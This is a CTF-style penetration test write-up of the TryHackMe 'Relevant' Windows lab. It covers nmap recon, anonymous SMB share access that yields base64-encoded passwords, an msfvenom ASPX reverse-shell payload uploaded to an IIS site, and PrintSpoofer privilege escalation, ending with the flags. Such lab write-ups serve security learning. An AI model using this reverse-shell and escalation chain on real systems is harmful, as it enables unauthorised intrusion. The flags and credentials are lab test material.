Try   HackMD

Relevant

tags: vulnerableMachine

Scope of work

  • black box penetration test

  • The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt

  • Root.txt

  • Any tools or techniques are permitted in this engagement

  • Locate and note all vulnerabilities found

  • Find and report ALL vulnerabilities (yes, there is more than one path to root)

Require format

  • executive summary
  • vulnerability
  • exploitation assessment
  • remediation suggestions

Recon

python3 ../../deepScan.py 10.10.221.83     
script is running. Author:meowhecker
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 11:59 CST
Nmap scan report for 10.10.221.83
Host is up (0.28s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-13T04:06:50+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2023-02-12T03:35:08
|_Not valid after:  2023-08-14T03:35:08
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2023-02-13T04:06:12+00:00
49663/tcp open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 5 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-02-13T04:06:15
|_  start_date: 2023-02-13T03:35:10
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-02-12T20:06:13-08:00

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   172.27 ms 10.17.0.1
2   ... 4
5   284.40 ms 10.10.221.83

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 451.86 seconds

potential vulnerable service

80 web

445 SMB server

49663 IIS Windows Server -> probably testing server

brute the file folder

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.43.201

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 14:10 CST
Nmap scan report for 10.10.43.201
Host is up (0.36s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.43.201\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.43.201\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.43.201\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.43.201\nt4wrksv: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 136.63 seconds

SMB login

smbclient //10.10.43.201/nt4wrksv

We could discover the SMB server have sensitive data

-> password.txt

get passwords.txt

[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Qm9iIC0gIVBAJCRXMHJEITEyMw== (Base64 Encode)

Decoded

https://www.asciitohex.com/


Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$


==> DIRECTORY: http://10.10.43.201:49663/aspnet_client/   
--> Testing: http://10.10.43.201:49663/captcha             
--> Testing: http://10.10.43.201:49663/carbuyaction  


http://10.10.43.201:49663/aspnet_client/

Initial Access

We can infer that the SMB directory is associated with the 49663 server, and that the directory actually exists.

Now, we could attempt to upload the web shell in order to gain initiall access.

http://10.10.43.201:49663/aspnet_client/

Based on URL path, we can infer that web application likely an ASP web server

ASP webShell

 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.11.72 LPORT=443 -f aspx -o webShell.aspx

To trigger the web shell using the web browser.

Privilege Escalation

It appears the current user has the SeImpersonatePrivilege token enabled, which means token impersonation could be used to escalate privileges.

Upload execute file

https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

Executing the exploit

PrintSpoofer64.exe -i -c cmd


powershell.exe

THM{fdk4ka34vk346ksxfr21tg789ktf45}

THM{1fk5kf469devly1gl320zafgl345pv}

Last changed by 
侯智晟
Email: meowheckerouo@gmail.com
0
313

Read more

經歷與筆記目錄

侯智晟 Email:meowheckerouo@gmail.com

Jun 6, 2025
Web LLM Attack

Nowadays, Most company integrate Large Language Model into the web systems for improve customer experience.

Jun 2, 2025
Race Conditions

First Present in Black Hat USA 2023

Apr 7, 2025
Weapons And Testing Flow

Identifying Services &amp; Operating System &amp; NSE Scanning

Mar 21, 2025
Read more from 侯智晟
Published on HackMD